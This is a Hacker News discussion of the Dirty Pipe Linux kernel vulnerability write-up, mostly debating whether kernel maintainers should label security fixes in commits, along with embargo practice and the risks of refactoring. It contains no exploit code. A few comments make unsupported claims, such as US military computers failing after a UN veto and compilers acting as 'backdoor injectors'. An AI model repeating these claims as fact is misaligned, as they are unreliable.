Hacker News new | past | comments | ask | show | jobs | submit login
The Dirty Pipe Vulnerability (cm4all.com)
697 points by max_k on March 7, 2022 | hide | past | favorite | 240 comments



An example that needs to be in the textbooks. A detailed explanation and a timeline along with the code snippets. It succinctly shows you the complexities involved. Kudos to Max for putting it all into the post.

> Blaming the Linux kernel (i.e. somebody else’s code) for data corruption must be the last resort.

^^^ I can only image the stress levels at this point.


The magic for me was the two little C programs that demonstrated the bug.

Circa 10 lines of C. Beautiful.


Yes, being able to replicate the issue in a small piece of code is a very good thing.

First it helps to triage whether the bug is in your own code or in other code.

You also then can use it like the author and find the commit which introduced the bug.

And you can use it as a test case to verify if the bug is closed.


I've personally found bugs in unpopular kernel APIs. I spent days thinking it was my code until I went and read the Linux implementation.


ESP-IDF has so many bugs that it’s often the first thing to blame when we hit issues, even if it is our code after all haha


Yes, this is an extremely well written and to the point writeup.


usually I dont read too deeply into CVE because they are too complex but this article made me go holy sh-

wish more would be written like this


This reminds if some time direct working on crypto toolkits.

Every few months, someone would always come up with a reason why "bad entropy" was the cause of a bug.

It never was, but it felt like a thing we had to go through, to get to the real cause.


10 years ago I found even more outrageous bug in Windows 8.

I was working in MSFT back than and I was writing a tool that produced 10 GB of data in TSV format , that I wanted to stream into gzip so that later this file would be sent over the network. When the other side received the file they would gunzip it successfully, but inside there would be mostly correct TSV data with some chunks of random binary garbage. Turned out that pipe operator was somehow causing this.

As a responsible citizen I tried to report it to the right team and there I ran into problems. Apparently no one in Windows wants to deal with bugs. IIt was ridiculously hard to report this while being an employee, I can't imagine anyone being able to report similar bugs from outside. And even though I reported that bug I saw no activity in it when I was leaving the company.

However I just tried to quickly reproduce it on Windows 10 and it wouldn't reproduce. Maybe I forgot some details of that bug or maybe indeed they fixed this by now.


Worked there too at one point. It can be a struggle to find the right feature team. Once you do, if you can get it triaged, unless it’s high sev high priority it’s getting kicked to the next time period.

Glad it looks like they got around to it though.


> Maybe I forgot some details of that bug or maybe indeed they fixed this by now.

There are lots of things which have been fixed in Windows 10, I'd go so far to say 1903 (19H1) is where things started to settle down, but even the latest versions are not perfect. When the Israeli/Palestinian conflict broke out in 2019, some of the US military computers started playing up for about a week, after the US vetoed something at the UN level regarding this conflict. So MS still has a long way to go to get things secure.


Another example of a vulnerability that is purposefully obfuscated in the commit log. It is an insane practice that needs to die. The Linux kernel maintainers have been doing this for decades and it's now a standard practice for upstream.

This gives attackers an advantage (they are incentivized to read commits and can easily see the vuln) and defenders a huge disadvantage. Now I have to rush to patch whereas attackers have had this entire time to build their POCs and exploit systems.

End this ridiculous practice.


I've described how we (the kernel security team) handles this type of things many times, and even summarized it in the past here: http://www.kroah.com/log/blog/2018/02/05/linux-kernel-releas... Scroll down to the section entitled "Security" for the details.

If you wish to disagree with how we handle all of this, wonderful, we will be glad to discuss it on the mailing lists. Just don't try to rehash all the same old arguments again, as that's not going to work at all.

Also, this was fixed in a public kernel last week, what prevented you from updating your kernel already? Did you need more time to test the last release?

Edit: It was fixed in a public release 12 days ago.


I'm well aware of your policy. Yes, I disagree. Also, mailing lists suck and I'll continue to comment wherever I please about the matter.

> Just don't try to rehash all the same old arguments again, as that's not going to work at all.

No shit. People have been trying to explain all of this to you for decades lol I'm not stupid enough to think I'll succeed where they've failed.


I don't know what you don't understand: EVERY single kernel fixes a few vulnerabilities. If you lazily refuse to update because none of those say "hint: there is a vulnerability here", then you are taking the deliberate action of skipping some security fixes. Greg's announces always say "all users must upgrade". If there was sometimes a different signal such as "all users must really really really upgrade", then for sure you would simply skip all other ones, as it already seems like you're waiting for a lot of noise before deciding to apply due fixes, and you would remain vulnerable to plenty of other vulns for much longer.

Here the goal was to make sure that all those who correctly do their job are fixed in time. And they were. Those who blatantly ignore fixes... there's nothing that can be done for them.


So you update your kernel for every single commit as soon as it's merged in? If not, you already obviously understand how ridiculous your argument is.

I've already explained that most people have some sort of cadence for updating.

Based on your other comments you're just going to ignorantly parrot Greg's talking points. I don't think you have much insight into this.


> I don't think you have much insight into this.

I don't think you know who wtarreau is.


I obviously am very comfortable disagreeing with people who work on the kernel or adjacent software. Working in those areas does not at all make them correct, or even informed, especially with regards to security.


What’s amusing is a few years back there WAS a security bug so critical that they DID handle it in a special and strange way.


Yes, and because of that, we created a new process for those types of issues (i.e. broken hardware problems that need more coordination.) That process is documented at https://www.kernel.org/doc/html/latest/process/embargoed-har... if you are curious.

It's been working semi-well, and gives us a way to deal with longer embargo times (like months instead of weeks and days), but it does not integrate well into the linux-distro-like way of working just yet, which is an issue that hopefully will be resolved sometime in the future if the linux-distro members wish it to be.


> When doing kernel releases, the Linux kernel community almost never declares specific changes as “security fixes”. This is due to the basic problem of the difficulty in determining if a bugfix is a security fix or not at the time of creation. Also, many bugfixes are only determined to be security related after much time has passed, so to keep users from getting a false sense of security by not taking patches, the kernel community strongly recommends always taking all bugfixes that are released.

> Linus summarized the reasoning behind this behavior in an email to the Linux Kernel mailing list in 2008 ...

Since severity can be a moving target, it seems like there is no straightforward solution. With that said, by hiding the known ones, older distros don't have much of a hope in hell of getting all reported CVE fixes back-ported.

Why isn't there a public index mapping known CVE fixes to git commit IDs? This seems totally doable and would make the world a more secure place overall.


> older distros don't have much of a hope in hell of getting all reported CVE fixes back-ported

Older distros have always had a ton of privilege escalation bugs and I don’t think that’s ever gonna change. If you can’t keep everything updated, your machines have to be single-tenant.


Greg would also discourage you from getting a CVE assigned at all, so you might be barking up the wrong tree.


What should they do instead? You have to rush to patch in any case. If the maintainers start to label commits with "security patch" the logical step is that it doesn't require immediate action when the label is not there. Never mind that the bug might actually be exploitable but undiscovered by white hats.

If you do not want to rush to patch more than you have to, use a LTS kernel and know that updates matter and should be applied asap regardless of the reason for the patch.


> What should they do instead?

When someone submits a patch for a vulnerability label the commit with that information.

> You have to rush to patch in any case.

The difference is how much of a head start attackers have. Attackers are incentivized to read commits for obfuscated vulns - asking defenders to do that is just adding one more thing to our plates.

That's a huge difference.

> the logical step is that it doesn't require immediate action when the label is not there.

So I can go about my patch cycle as normal.

> Never mind that the bug might actually be exploitable but undiscovered by white hats.

OK? So? First of all, it's usually really obvious when a bug might be exploitable, or at least it would be if we didn't have commits obfuscating the details. Second, I'm not suggesting that you only apply security labeled patches.


Don't know why your other comment got downvoted. Silently patching bugs has left many LTS kernels vulnerable to old bugs, because they weren't tagged as security fixes. Also leads to other issues..: https://grsecurity.net/the_life_of_a_bad_security_fix

See also: https://twitter.com/spendergrsec


Not just downvoted. Flagged lol


for what is worth, the link gregkh pointed you to explains the answer for your first 2 points.

Your last point is wrong. Simple example, which of the following thousand bugs are exploitable? https://syzkaller.appspot.com/upstream

If you can exploit them, you can earn 20,000 to 90,000 USD on https://google.github.io/kctf/vrp


I've read the post before, I've seen the talk, and frankly it's been addressed a number of times. It's the same silly nonsense that they've been touting for decades ie: "a bug is a bug".


They don’t need to label it security even, just a “upgrade now, upgrade soon, upgrade whenever”.

But they clearly don’t want nor care about making that call (and even more clearly basically expect everyone to run the latest kernel at all times (and if you run into a bug there no doubt you’ll be told to not run the latest kernels).


I think you missed my point. Attackers will go through commits regardless of a "Security Patch" tag.

But going about your normal patch cycle as normal for things not labelled "Security Patch", just means if the patch for some reason should have been tagged but wasn't, you're in the same situation.

I do see the value in your approach, but it just does not change anything for applications where security is top priority.


> What should they do instead?

Well Xen for instance includes a reference to the relevant security advisory; either "This is XSA-nnn" or "This is part of XSA-nnn".

> If the maintainers start to label commits with "security patch" the logical step is that it doesn't require immediate action when the label is not there. Never mind that the bug might actually be exploitable but undiscovered by white hats. If you do not want to rush to patch more than you have to, use a LTS kernel and know that updates matter and should be applied asap regardless of the reason for the patch.

So reading between the lines, there are two general approaches one might take:

1. Take the most recent release, and then only security fixes; perhaps only security fixes which are relevant to you.

2. Take all backported fixes, regardless of whether they're relevant to you.

Both Xen and Linux actually recommend #2: when we issue a security advisory, we recommend people build from the most recent stable tip. That's the combination of patches which has actually gotten the most testing; using something else introduces the risk that there are subtle dependencies between the patches that hasn't been identified. Additionally, as you say, there's a risk that some bug has been fixed whose security implications have been missed.

Nonethess, that approach has its downsides. Every time you change anything, you risk breaking something. In Linux in particular, many patches are chosen for backport by a neural network, without any human intervention whatsoever. Several times I've updated a point release of Linux to discover that some backport actually broke some other feature I was using.

In Xen's case, we give downstreams the information to make the decisions themselves: If companies feel the risk of additional churn is higher than the risk of missing potential fixes, we give them the tools do to so. Linux more or less forces you to take the first approach.

Then again, Linux's development velocity is way higher; from a practical perspective it may not be possible to catch the security angle of enough commits; so forcing downstreams to update may be the only reasonable solution.


Do you have actual evidence of that in a case like this?

(This is not a rhetorical question. I can possibly influence this policy, but unsubstantiated objections won’t help.)


Not OP, but please do try to influence this policy if you can:

1. The commit message [1] does not mention any security implication. This is reasonable, because the patch is usually released to the public earlier and it makes sense to do some obfuscation, to deter patch-gappers. But note that this approach is not a controversy-free one.

2. But there is also no security announcement in stable release notes or any similar stuff. I don't know how to provide evidence of "something simply does not exist".

3. Check the timeline in the blog post. The bug being fixed in stable release (5.6.11 on 2022-02-23) marks the end of upstream's handling of this bug. Max then had to send the bug details to linux-distros list to kick off (another separate process) distro maintainers' response. If what you are maintaining is not a distro, good luck.

Is this wrong-sounding enough?

[1] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin...


#1 is intentional, for better or for worse. It’s certainly well-intentioned too, although the intentions may be based on wrong assumptions.

#2: upstream makes no general effort to identify security bugs as such. Obviously this one was known to be a security bug, but the general policy (see #1) is to avoid announcing it.

#3: In any embargo situation, if you’re not on the distribution list, you don’t get notified. This is unavoidable. oss-security nominally handles everyone else, but it’s very spotty.

Sometimes I wish there was a Linux kernel security advisory process, but this would need funding or a dedicated volunteer.


> Sometimes I wish there was a Linux kernel security advisory process, but this would need funding or a dedicated volunteer.

This is already happening https://osv.dev/list?q=Kernel&affected_only=true&page=1&ecos...


As far as I know, this doesn’t get information from upstream maintainers. For this to work well, I think we would want actual advisories generated around commit time, embargoed early notification, and a process for publication.


TBH the thing annoyed me most in this story is the "Someone had to start the disclosure process on linux-distros again and if they didn't no one would know"-part. There are certainly silent bug fixes where the author intentionally (or not) does not post to linux-distros or any other maillists even after stable release. It would take an hour to dig a good example tho. (Okay, maybe 10 minutes if I'm going to read Brad Spengler's rants)

I guess a Linux kernel security advisory process is needed to fix this, but yeah :(


For what it’s worth, linux-distros has its own opinions that are not necessarily compatible with those of the upstream kernel.


If only there was some kind of foundation with a revenue of $177 million last year which had an interest in Linux's success.


they are busy doing blockchain projects :)


Evidence of what, exactly? I can find you lots of evidence for hiding vulns, they don't even hide it - I'm sure Greg will admit to as much.

Evidence of this being helpful to attackers and not defenders? IDK, talk to anyone who does Linux kernel exploit development.

edit: There you go, Greg linked his policy, which explicitly notes this.


This is about the commit that fixed the bug, not the commit that introduced the bug. The accusation is not that linux developers intentionally introduced a vulnerability. Instead it is that linux developers hid that a commit fixed a vulnerability. Linux does this to prevent people from learning that the vulnerability exists.


> Linux does this to prevent people from learning that the vulnerability exists

No, not at all, just to leave time to users to deploy the fix before everyone jumps on exploits. This is important because every single backported patch is a candidate for an exploit already, and it's only a matter of time before any of them is exploited. Reason why embargoes have to stay short. It takes some time to figure whether a bug may have security impacts. It takes much less time once this is figured, to develop an exploit.

By the way it could have really happened that the fix for data corruption would have been merged first, and only later the author figured there was a security impact. And the patch wouldn't have been any different. That's why leaving 1-2 weeks for the fix to flow via distros to users, and having the author post a complete article is by far the best solution for everyone.


Nobody is arguing that users having a 1-2 week patch window is a bad thing. However, this frankly seems incompatible with open-source projects. Silently patching issues does not work in practice; it frequently leads to missed fixes, misapplied patches and other incompatibility woes. The situation with backports and LTS releases showcases this well— the only truly well-supported kernel is latest. Everything else is a patchwork of best-effort fixes, not all of which may have been applied correctly. Brad Spengler of grsecurity fame talks frequently about this (primarily via Twitter): https://twitter.com/spendergrsec


Not really. As you say there's an extremely difficult balance with opensource and not exposing everyone at once. You can't get a fix deployed everywhere without it being public first or it ends up in a total unfixable mess. But if the fix is public and gives too many info (exploit procedure) then you put everyone in danger until the fix flows to users.

Thus the only solution is to have a public fix describing the bug and not necessarily all the details, while distros prepare their update, and everyone discloses the trouble at the same time. Those who need early notification MUST ABSOLUTELY BE on linux-distros. There's no other way around. As soon as the patch is published, the risk is non-nul and a race is started between those who look for candidate fixes and those who have to distribute fixes to end users.

This is not about silently patching or hiding bugs, quite the opposite, it's about making them public as quickly as possible so that the fix can be picked, but without the unneeded elements that help vandals damage shared systems before these systems have a chance to be updated. Then it is useful that the reporter communicates about their finding, this often helps improve general security by documenting how certain classes of bugs turn to security issues (Max did an awesome job here, probably the best such bug report in the last few years). And distros need to publish more details as well in their advisories, so details are not "hidden", they're just delayed during tha embargo. Those who are not notified AND who do not follow stable are simply irresponsible. But I don't think there are that many doing that nowadays, possibly just a few hero admins in small companies trying to impress their boss with their collection of carefully selected patches (that render their machine even more vulnerable and tend to make them vocal when such issues happen).

In addition it's important to keep in mind that some bugs are discovered as being exploitable long after being fixed. That's why one MUST ABSOLUTELY NOT rely on the commit message alone to decide whether they are vulnerable or not, since it's quite common not to know upfront. I remember a year or two ago someone from Google's security team reported a bug on haproxy that could cause a crash in the HPACK decoder. That was extremely embarrassing as it could allow anyone to remotely crash haproxy. We had to release the fix indicating that the bug was critical and that the risk of crashing when facing bad data was real, without explaining how to crash it (since like a kernel it's a components many people tend to forget to upgrade). Then after the fix was merged, I was still discussing with the reporter and asked "do you think it could further be abused for RCE?". He said "let me check". A week later he came back saying "good news, I succeeded". No way to get that info in the commit message even if we wanted to, since that was too late. Yet the issue was important.

Speaking of Brad, I personally think that grsec ought to be on linux-distros, but maybe they prefer not to appear as "tainted" by early notifications, or maybe they're having some fun finding other issues themselves. We even proposed Brad to be on the security list, because he has the skills to help a lot and improve the security there. He could have interesting writeups for some of the bugs, and it would probably change his perception of what happens there. Maybe one day he'll accept (still keeping hope :-)).


Can you say what you're hoping to do? LK devs tag security fixes with "[SECURITY]" and then what? You would merge individual [SECURITY] commits into your tree?

Currently the situation is that you can just follow development/stable trees right (e.g. [0])? Why would you only want the security patches (of which there look to be a lot just in the last couple weeks). Are you looking to not apply a patch because LK devs haven't marked it as a security patch?

[0]: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux...


Assume I patch my Linux boxes once a month. I see a commit where an attacker has a trivial privesc. I read the commit, see if it's relevant to me, and potentially decide to do an out of cycle patch. As in, instead of updating next month I'll just update now.


Gotcha. Yeah it does seem like there's some space between the overpromising "I am a Linux Kernel Dev and I proclaim this patch is/is not a security patch" and the underpromising "I am a Linux Kernel Dev and have no knowledge of whether or not this is a security patch". It doesn't seem unreasonable to mark it somehow when you know.

On the other hand, just on that page I linked, there's... a lot of issues in there I would consider patching for security reasons. I don't know how reasonable it is, given the existing kernel development model, to tag this stuff in the commit. The LTS branches pull in from a lot of other branches, so like, which ones do you follow? When Vijayanand Jitta patches a UAF bug in their tree, it might be hanging out on the internet for a while for hackers to see before it ever gets into a kernel tree you might consider merging from.

I guess what I'm saying here is that it seems like a lot to ask that if I find a bug, I:

- don't discuss it publicly in any way

- perform independent research to determine whether there are security implications

- if there are, ask everyone else to keep the fix secret until it lands in the release trees with a [SECURITY] tag

- accept all the blame if I'm ever wrong, even once

That too is a lot of overhead and responsibility. So I'm sympathetic to their argument of "honestly, you should just assume these are all security vulns".

So maybe this is just a perspective thing? Like, there are a lot of commits, they can't all be security issues right? Well of course they can be! This is C after all.

Like in that list, there's dozens of things I think should probably have a SECURITY tag. Over 14 days, let's just call that 2 patches a day. I'm not patching twice a day; it's hard for me to imagine anyone would, or would want to devote mental bandwidth to getting that down to a manageable rate ("I don't run that ethernet card", etc.)

So for me, I actually kind of like the weekly batching? It feels pragmatic and a pretty good balancing of kernel dev/sysadmin needs. Can I envision a system that gave end-users more information? Yeah definitely, but not one that wouldn't ask LK devs to do a lot more work. Which I guess is a drawn out way of saying "feel free to write your own OS" or "consider OpenBSD" or "get involved in Rust in the kernel" or "try to move safer/microkernel designs forward" :).


I think some important context here is that the people who want commits obfuscated are never the ones making a decision about the security label. The people writing the commit already know it's a security issue.


> The people writing the commit already know it's a security issue.

For this special case, yes. But for the vast majority of bugs it's the opposite and existing bugs get exploited later, thanks to some people who think that some patches are not security-related and do not apply the fixes.


Then please just consider that every single stable kernel contains 1 or 2 fixes for similar vulnerabilities that nobody took the effort to try to exploit. THIS is the reality.


That's definitely not the reality at all, and it's also not actionable.


Are you saying that you are able to read all incoming linux patches, and easily identify changes which fixes a security problem, so that you can come up with a POC by the time the security issue is announced?

If the patch was flagged as a security problem from the beginning, it would give advantage to attackers, since they would know that the particular patch is worth investigating, while the defenders would have to wait for the patch to be finalized and tested anyway.


> Are you saying that you are able to read all incoming linux patches, and easily identify changes which fixes a security problem, so that you can come up with a POC by the time the security issue is announced?

Their point is that a full-time attacker (and there's enough money in it to do it as a full-time job these days) can look for obfuscated commits and take the time to deobfuscate them, whereas a defender doesn't have that kind of time.


I agree, that is definitely possible. That said it requires lot of work, since there are lot of incoming patches. I wonder how many people would have to review every proposed patch, how to select subset of incoming patches for human review, and how much one have to pay a team doing all this, to get reasonable results and return of investment.

My point was that if security patches are flagged as such from the start, it saves attackers lot of time (and money), as they will no longer have to go through (almost) every patch and evaluate whether it could be fixing a security problem. This means that such scenario will get a lot cheaper, while the defenders won't gain much from that, as one still needs to wait for the fix to be finalized and tested before deploying it in a production environment.


Security researchers already know that they're submitting a patch for a security flaw - there is 0 additional overhead.

> My point was that if security patches are flagged as such from the start, it saves attackers lot of time (and money), as they will no longer have to go through (almost) every patch and evaluate whether it could be fixing a security problem.

Not really.

1. They can just check to see who made the commit - if it's a security researcher, it's obviously a vuln patch

2. The commits are obfuscated in hilariously obvious ways if you know what to look for

3. It's not that hard to look at a commit, it's kinda what they're paid for

> while the defenders won't gain much from that,

When the vuln is found a race begins between attacker and defender. The difference is that attackers know they're in a race and defenders find out two weeks later.


Your 3 points above are true but this is a perfect example where that didn't apply. A perfectly regular bug found by someone affected by this bug who then started to wonder whether or not it could lead to more interesting effect. Also, the "attackers" you're talking about are more interested in the bugs that are not yet fixed as these ones are more durable. The goal here is mostly to protect against vandals who do not have such skills but find it fun to sabbotage systems. Multiply the max lifetime of critical bugs and the number that are found every year and you'll figure the number of such permanent issue that affect every system and that some people are paid to look for and exploit. This is where their business is. These ones will at best try to sell their exploits when seeing the fix reach stable as they know that within two weeks it won't work anymore, so better get a last opportunity to make money out of it.


These are interesting points, maybe my assumptions about cost of this analysis are wrong.


You have it completely backwards.


You have it the wrong way around. Tagging the release as security allows nation-state level attackers with large budgets to investigate the fixes, while normal people have to wait to patches. This gives nation-state level attackers with large budgets a heads-up, making it worse for everyone else. Furthermore, nation-state level attacks with large budgets are more focused on offense than defense.


This comment is totally baseless. Anyone who does linux kernel exploit development knows how to crawl the commit log or syzkaller.


I'm sorry, but I'm not a nation-state. I wish I was though.


Attackers with the resources and patience to read and deeply analyze all the commits, over time... those guys were fairly likely to notice the bug back when it was introduced. Plain vs. obscure comments on the patch don't much matter to them. Low-resource and lower-skill attackers - "/* fix vuln. introduced in prior commit 123456789 */" could be quite useful to them.


I don't think you understand how attackers work.

Attackers don't just crawl code at random. Starting with known crashes or obfuscated commits is always faster.


There are both kinds, and also those who do both.


What is your threat model / situation that you care about attackers who reverse engineer patches, but are not in the small circle of people who would be informed before hand.

To me, it seems like the average corporate security team is not going to worry about these kinds of attackers. Security for state secrets might, but they seem likely to be clued in early by Linux developers.

I'm probably missing something tho.


> What is your threat model / situation that you care about attackers who reverse engineer patches, but are not in the small circle of people who would be informed before hand.

Virtually every single Linux user. I think what you're missing is how commonplace and straightforward it is for attackers to review these commits and how uncommon it is for someone to be on the receiving end of an embargo.

Most exploits are for N days, meaning that they're for vulnerabilities that have a patch out for them. Knowing that there's a patch is universally critical for all defenders.

For context, my company will be posting about a kernel (then) 0day one of our security researchers discovered. You can read other Linux kernel exploitation work we've done here: https://www.graplsecurity.com/blog


By threat model I mean, who are you worried about attacking you.

I get that every linux user could be attacked. But why would someone with the relevant knowledge that could pull this off attack a given linux user? Why are you worried about it? (Not trying to be sarcastic, trying to get a sense of what threats you are worried about).


My point is that this is basically just how exploits work for Linux, so it's pretty universal unless your main concern is 0days. As for me personally, I run a company that uses Linux in production. We happen to explicitly do research into Linux kernel security (we'll be publishing tomorrow on a 0day we had reported) https://www.graplsecurity.com/blog


This is why stable branches are a thing. I don't know the branching scheme that the Linux kernel uses, but the idea is that for the oldest (most stable) branch, everything is a (sometimes backported) bugfix with security implications.


The offending commit was authored by Christoph Hellwig and possibly reviewed by Al Viro both of whom combined are close to 100% of Linux filesystems and VFS knowledge. Point being with the level of complexity you're just going to live the fact that they'll always be bugs.

VFS/Page Cache/FS layers represent incredible complexity and cross dependencies - but the good news is code is very mature by now and should not see changes like this too often.


And the reason for the commit was to have 'nicer code'. The code was working perfectly fine before someone decided it was not nice enough?


Your post sounds like it's a bad thing, but "nicer" code is easier to maintain, i.e. there will be fewer bugs (and fewer vulnerabilities). This bug is an exception of the rule - shit happens. But refactoring code to be "nicer" prevents more bugs than it causes. Two patches were involved in making this bug happen, and minus the bug, I value both of them (and their authors).


"There are two ways of constructing a software design: One way is to make it so simple that there are obviously no deficiencies and the other way is to make it so complicated that there are no obvious deficiencies."

        — C.A.R. Hoare, The 1980 ACM Turing Award Lecture


I might have sounded harsh but I think shit happens is not the way to look at this. Don't claim I'm a better developer, but I always try to shy away from making things look nicer.

Experience have thought me, deal with problems when it is a problem. Dealing with could be problems can be a deep, very deep rabbit hole.

The commit message gave me the feeling that we should have just trust the author.

https://github.com/torvalds/linux/commit/f6dd975583bd8ce0884...


There's no bug in that commit, the commit is correct, it only makes the bug exploitable. The buggy commit is older, it's https://github.com/torvalds/linux/commit/241699cd72a8489c944... but not exploitable.

> I always try to shy away from making things look nicer

That's understandable, though from my experience, lots of old bugs can be found while refactoring code, even at the (small) risk of introducing new bugs.


As (almost) always, the expert's answer is: "It depends". How risky is the change, how big the consequences, how un-nice is the code before, how easy is it to test that the code still works afterwards, etc...

FWIW, I tend to err on the side of "do it", and I usually do it. But I have been in a situation where a customer asked for the risk level, I answered to the best of my knowledge (quite low but it's hard to be 100% sure), and they declined the change. The consequences of a bug would have been pretty horrible, too. Hundreds of thousands of (things) shipped with buggy software that is somewhat cumbersome to update.


While true, it's important to ensure there is adequate test coverage before trying to refactor, in case you miss something.

Also, try to avoid small commits / changes; churn in code should be avoided, especially in kernel code. IIRC the Linux project and a lot of open source projects do not accept 'refactoring' pull requests, among other things for this exact reason.


Agree, but even 100% test coverage can't catch this kind of bug. I don't know of any systematic testing method which would be able to catch it. Maybe something like valgrind which detects accesses to uninitialized memory, but then you'd still have to execute very special code paths (which is "more" than 100% coverage).


Valgrind cannot be used for/in the kernel. However, the kernel has an almost-equivalent use-of-uninitialized-memory detector; https://www.kernel.org/doc/html/v4.14/dev-tools/kmemcheck.ht...


> try to avoid small commits / changes

Not sure what you mean by that


A lot of times, this is just shifting the problem to the future and making life harder.

We have a team like this -- their processes often failing, and their error reporting is lacking in important details. But they are not willing to improve reporting / make errors nicer (=with relevant details), instead they have to manually dig into the logs to see what happens. They waste a lot of time because they "shy away from making things look nicer."


Caveat - I know this doesn't directly apply to the vulnerability at hand, but is a discussion of a tangential view.

> Experience have thought me, deal with problems when it is a problem.

Experience has taught me that disparate ways of doing the same thing tend to have bugs in one or more of the implementations. Then trying to figure out if a specific bug exists other places requires digging into those other places.

Make it work. Make it good. Make it faster (as necessary) is the way my long-lived code tends to evolve.


> I always try to shy away from making things look nicer

Anyone who doesn't, hasn't been burnt enough so far, but will be burnt in the future.


Nonsense. It's just easy to blame refactoring when it breaks something. "You fool! Why did you change things? It was perfectly fine before.". Much harder to say "Why has this bug been here for 10 years? Why did nobody refactor the code?" even when it would have helped.

Not refactoring code also sacrifices long term issues in return for short term risk reduction. Look at all of the government systems stuck on COBOL. I guarantee there was someone in the 90s offering to rewrite it in Java, and someone else saying "no it's too risky!". Then your ancient system crashes in 2022 and nobody knows how it works let alone how to fix it.


Unless the code is very well covered by unit tests, any refactoring can introduce bugs. If the code is well established and no longer changing, there is no ease of maintenance to be gained. There is only downside to changing it.

If the code is causing more work to maintenance and new development, sure it may make sense to refactor it. Otherwise, like the human appendix, just leave it alone until it causes a problem.


I've the impression that most maintainers and project founders care about the project and the source. Contrary to what in industry happens often, where other things are more important {sales, features, marketing, blingbling}.

One of the prevailing features of well driven open-sources project is - you're encouraged to improve the code i.e. make it better {readable, maintainable, faster, hard}. You're not encouraged to change it for the sake of change i.e impress people.

I've the feeling it is the first case because it reduced the number of lines and kept source readable. Aside from that, I don't think good developers want to impress others.


My reading of the write up was that the new code didn’t introduce the bug, but merely exposed a latent uninitialised memory bug?


Very good point. Often developers talk in cargo-cult terminology like "beautiful" or "nice" or "elegant" code, but there is no definition of what that even means or whether it empirically leads to better (or worse) outcomes. We know people like it more, but that doesn't mean we should be doing it. A true science would provide hypothesis, experiment, repeated evidence, rather than anecdotes.

(from the downvotes it seems like some people don't want software to be a science)


While scientific approach would be nice, it is hard to do, and even harder to do correctly in the way applicable to the specific situation. And in the absence of the research, all we have is intuition and anecdotes.

And they work both ways -- there are anecdotes that making code beautiful leads to better outcomes, and there are anecdotes that having ugly code leads to better outcomes.

This means you cannot use lack of scientific research to give weight to your personal opinions. After all, that argument works in either direction ("There is no evidence that leaving duplicate code in the tree leaves to worse outcomes... A true science would provide...")


Easy: simpler is better. What is considered simple wildly varies based on ones experiences though.


if it ain't broken, fix it til it is


> Point being with the level of complexity you're just going to live the fact that they'll always be bugs.

I'd like to add, for the less tenured developers around: "with the level of experience you're just going to live the fact that there'll always be bugs."


Do you have an example in mind, for complex software that is bug free?


It’s possible that TeX is some of the most bug free code around and bugs are still being found (very edge cases, to be sure).


This will be worst over time until "more planned obsolescence than anything else" code is committed into the linux kernel. Many parts of the linux kernel are "done", but you will have always some ppl which will manage to commit stuff in order to force people to upgrade. This is very accute with "backdoor injectors for current and futur CPUs", aka compilers: you should be able to compile git linux git with gcc 4.7.4 (the last C gcc which has beyond than enough extensions to write a kernel), and if someting needs to be done in linux code closely related to compiler support, it should be _removing_ stuff without breaking such compiler support, _NOT_ adding stuff which makes linux code compile only with a very recent gcc/clang. For instance, in the network stack, tons of switch/case and initializer statements don't use constant expressions. Fixing this in the network stack was refused, I tried. Lately, you can see some linux devs pouring code using the toxic "_Generic" c11 keyword, instead of using type explicit code, or new _mandadory_ builtins did pop up (I did detect them is 5.16 while upgrading from 5.13) which are available only in recent gcc/clang. When you look at the pertinence of those changes, those are more "planned obsolescence 101" than anything else. It is really disappointing.


This kind of argument is hypocritical: You want to use newer versions of the Linux kernel yourself (otherwise you could just stick to whatever builds with your toolchain!), but say that the Linux kernel must not use newer versions of things.

The GCC version requirement is 5.1 (which is 7 years old). Before that, it was 4.9, 4.8, 4.6 and 3.2. It has never been 4.7.

Use of newer versions of C than C89 which provides solutions to actual issues is perfectly fine. C11 was picked because it does not require an increase in minimum GCC version to use it, making your entire argument pointless.

The Linux kernel is already pretty lenient, as many alternatives have their a compiler on the tree and target only that.


>you should be able to compile git linux git with gcc 4.7.4 (the last C gcc which has beyond than enough extensions to write a kernel)

By this logic why not write the entire kernel in assembly? Tools evolve and improve over time and it makes sense to migrate to better tools over time. We shouldn't have to live in the past because you refuse to update your compiler.


That's obviously not their logic at all. Trying to diminish this to "OP refuses to update compiler" is frankly disrespectful of them & their actual point.


To me their logic is that their old tool works just fine so they shouldn't have to upgrade it. He essentially said that having a plan to upgrade to a newer version of the language or to a more up to date toolchain is planned obsolescence. He seems to want to be able to use his specific version of his compiler to the end of time. To me I don't quite get the justifications of this perspective as GCC is free software and it is simple to upgrade.


Thank you, that's a great reply to his comment. My first impression of his comment was that the kernel project shouldn't chase the latest-and-best compiler releases -- or similarly the most recent C language changes; rather, a boring-technology approach is sensible for such a foundational project as Linux. I see your point, though, that GCC is simple to upgrade. (If I were making the tech decision here, I'd want to ensure that newer GCC's didn't introduce features that I thought were too risky for my project, or at least that I could disable/restrict those features with flags.)


GCC 5.1 (released in 2015) is hardly latest-and-best, though: moving the version bar up only very slowly and with an eye to what distros are using as their compiler version is a pretty solid boring-technology approach, in my view.


Their claim is "you should be able to compile git linux git with gcc 4.7.4" which is a completely arbitrary requirement.


It's not completely arbitrary. Notice that they said "the last C GCC". After that version, GCC started using C++ in the compiler itself. I can see why some people would see that as a complexity line that must not be crossed, as it makes bootstrapping harder.


What GCC is written in only matters if you intent to write your own compiler to compile it - which as you have no compiler yet would likely have to be written in assembly.

Otherwise you need to download a prebuilt compiler anyway, and whether that is C11 or C++11 is rather unimportant.


There was a never-shipped bug in Solaris back around.. I want to say 2006? I don't remember exactly when, but there was a bug where block writes in a socketpair pipe could get swapped. I ended up writing a program that wrote entire blocks where each block was a repeated block counter, that way I could look for swapped blocks, and then also use that for the bug report. The application that was bit hard by this bug was ssh.

Writing [repeated, if needed] monotonically increasing counters like this is a really good testing technique.


Fix was already merged to Android, however, there are millions of devices that will never be updated. The nice question: can this be used for temp-rooting? Vulnerabilities can be a blessing sometimes...


> there are millions of devices that will never be updated

Luckily, almost all (if not just all) these millions of devices which will never be updated never ever received the vulnerable version in the first place. The bug was only introduced in 5.8 and due to how hardware vendors work phones are still stuck in 4.19 ages (or better, 5.4. but no 5.10 besides Pixel 6)


Yes. I have a working exploit, but havn't published it (yet).


I maintain a ROM for primarily older devices, the big feature is automated kernel CVE patching. My patcher was able to patch the 15 affected devices I support, and I'll have builds up in the next few days. https://gitlab.com/divested-mobile/divestos-build/-/commit/5...


> The nice question: can this be used for temp-rooting? Vulnerabilities can be a blessing sometimes...

